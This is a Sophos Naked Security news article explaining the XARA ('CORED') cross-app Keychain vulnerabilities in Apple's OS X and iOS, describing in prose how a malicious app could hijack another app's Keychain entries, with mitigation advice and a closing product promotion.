Naked Security Naked Security

Apple OS X and iOS in the vulnerability spotlight – meet “CORED,” also known as “XARA”

The security issue of the week has arrived in iOS and OS X, and it's attracted a funky name already. The researchers called it XARA, but others had different ideas, and dubbed it "CORED." As in "Apple CORED."

The security issue of the week has arrived, and, quelle surprise, it’s attracted a funky name already.

The researchers who wrote it up tried to call it XARA, not least because then they got to call their XARA detection tool by the name XAVUS.

(Geddit? Pronounce “X” in the American style, as if it were “Z”, and make the “A” into a long vowel, not short, and all will be clear.)

But the vulnerabilities they found were part of Apple’s OS X and iOS operating system, so our friends over at The Register were having none of XARA.

XARA, by the way, stands for Cross-App Resource Access, and one of the main XARA problems that the researchers found was an Elevation of Privilege (EoP) hole that lets app X get unauthorised access to app Y’s entries in the Apple Keychain.

Understanding Keychain

Keychain is the operating system component where things like passwords, security tokens, credential data and other application-specific secrets are stored.

It is deliberately designed to make it difficult for apps to read each other’s private data, even if those apps are processes running under the same user’s account.

Historically, software simply stashed its private data in private files in a private directory (or in the registry, which is a special sort of file-and-directory container on Windows), and relied on the operating system’s regular Access Control List (ACL) system to regulate access.

As a result, my apps couldn’t read data from your apps, assuming we were users with different logins on the same computer, which was a good thing.

Of course, that meant my apps could easily plunder each other’s data, on the grounds that it’s my data, so I should have access to it anyway.

But in today’s cloud-based, online world, that can make life much too easy for malware.

If I run a dodgy program and inadvertently give it permission to login to my Facebook account, the “divide-and-conquer” principle says that it is highly desirable if the malicious app can’t casually take over my Twitter, my Snapchat and my Outlook.com accounts as well.

Thus, Keychain: an operating-system level “divide-and-conquer” system for app-specific authentication data.

Keychain serves a similar purpose to the same origin policy in browsers, whereby even though I choose to visit two different sites at the same time, the browser keeps their data separate for my greater safety.

Anyway, with Keychain being the core of Apple’s credential management, and our researchers having found a way to worm their way around in this core component, The Register came up with the name CORED, allowing them to use the headline “Apple CORED.”

So, CORED it is.

How attackers think

The research paper is quite extensive – indeed, we’re still working our way through its details – but the XARA problems in Keychain are perhaps the catchiest of the bunch, and they give a fascinating insight into how attackers think when they’re probing for problems in a security protocol.

What the authors found is a way to exploit the fact that Keychain isn’t quite as simple as “one app, one password storage bucket.”

If that’s how it worked, this bug wouldn’t exist, and Keychain would be easier to test for security correctness.

But software writers would be unhappy, because it would then be impossible for complementary apps to share private data such as account names and login credentials.

So, the researchers realised that they could exploit what is effectively a race condition, where two processes go for a single resource, and if the wrong process gets there first, it can subvert the correct operation of the other.

Wining the race

Let’s say you have an app called SocialNet installed, but you have’t logged in with it yet, so it hasn’t got around to creating a Keychain entry with your login credentials in it.

When you do login for the first time, it will create a Keychain item called logincookie, and save its secret data there, where my malware can’t read it without alerting you to the subterfuge, for example by popping up an adminstrator prompt.

Or so you’d hope.

But in this case, my malware can create its own logincookie, and tell Keychain, “By the way, I trust SocialNet to access this item, too.”

And so, when you get around to logging in with SocialNet, there’s a good chance (unless the programmers of SocialNet decided to watch out out for treachery of this sort) that the app will save its login cookie in this already-created Keychain object.

Then, my malware can read it without triggering any sort of alert.

Actually, it’s worse than that, because even if SocialNet has already created its own logincookie, my malware may be able to delete that data without authentication.

Sure, if I keep deleting your login credentials and deauthenticating your app, that could cause a Denial of Service (DoS) problem by decreasing privilege.

But, at a first thought, it feels as though deleting login cookies shouldn’t ever cause an increase in privilege for an unauthorised app.

Except that once I’ve deleted your Keychain item, I open up the race condition by which I can re-create it so that both your app and mine can read it back in future.

Such are the vagaries and unexpected complexities of security protocols!

Where next?

According to the researchers, who found similar cross-app data leakage issues in other inter-app protocols on OS X and iOS, these problems are part of the operating system core itself, and we shall need an update from Apple to get rid of them for ever.

Alternatively, and additionally, apps can adopt defensive programming tactics to help defend against these XARA holes, now they are known and documented.

As it happens, according to The Register’s report, the researchers claim to have told Apple more than six months ago, and only decided to publish their research when no mitigation was received or promised out of Cupertino.

The researchers also say they created malware apps that were able to exploit the XARA holes they’d found, and then successfully got them passed by Apple’s vetting process and accepted into the App Store.

What to do?

There isn’t a lot you can do right now.

But the following points can, and should, mitigate the risk:

  • Apple, we hope, is now looking out for apps that use these holes, making it much less likely that malware exploiting them will make it into the App Store again.
  • Untrustworthy apps can already pull off credential-stealing tricks without exploiting components such as Keychain, so keep on using that anti-virus software!
  • Thanks to the report, threat-prevention tools can now detect and block CORED-like holes and expect to avoid controversy, even if those detections find problems in otherwise legitimate apps.

You might be surprised to find how tricky it can be, if you’re a security researcher, to add generic detection and blocking even of notoriously insecure apps if they seem to have even a shred of legitimacy.

Actually, you probably won’t be surprised.

After all, if we could block risky code entirely on the basis of its risk, without reference to its origin, there wouldn’t be much Windows XP left!

Sophos Anti-Virus for Mac Home Edition

Want to keep an eye out for malware (CORED or not), malicious web links and other threats to your beloved Mac?

Sophos Anti-Virus for Mac Home Edition is 100% free (email address required), with no expiry and no time limit on updates.

Sophos for Mac also stops threats for Windows too, so it even protects non-Mac users you share files with.

Choose from blocking viruses in real time (on-access protection), scanning at scheduled times, or running a check whenever you want.

Click to go to download page...

Image of apple core courtesy of Shutterstock.